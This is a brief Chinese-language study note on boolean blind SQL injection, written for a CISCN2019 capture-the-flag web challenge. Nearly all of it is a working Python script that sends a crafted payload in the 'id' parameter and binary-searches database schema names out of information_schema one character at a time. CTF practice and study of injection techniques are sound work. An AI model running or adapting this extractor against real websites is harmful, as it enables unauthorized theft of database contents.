布尔盲注.md
参考[CISCN2019 华北赛区 Day2 Web1]Hack World(学习)
One possible wheel
import requests
import time
import sys
url = "http://xxx.node4.buuoj.cn:81/search.php"
fmt = '0^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)'
false_re = '<should a string that appears if and only if the result of fmt is false>'
for i in range(1, 200):
l = 0
r = 127
while l < r:
mid = (l + r) // 2
payload = fmt % (i, mid)
params = {'id': payload}
response = requests.get(url, params)
time.sleep(0.2)
if response.text.find(false_re) >= 0: # mid >= ans
r = mid
else: # mid < ans
l = mid + 1
print(chr(l), end='')
sys.stdout.flush()
#Web #SQL注入 #布尔盲注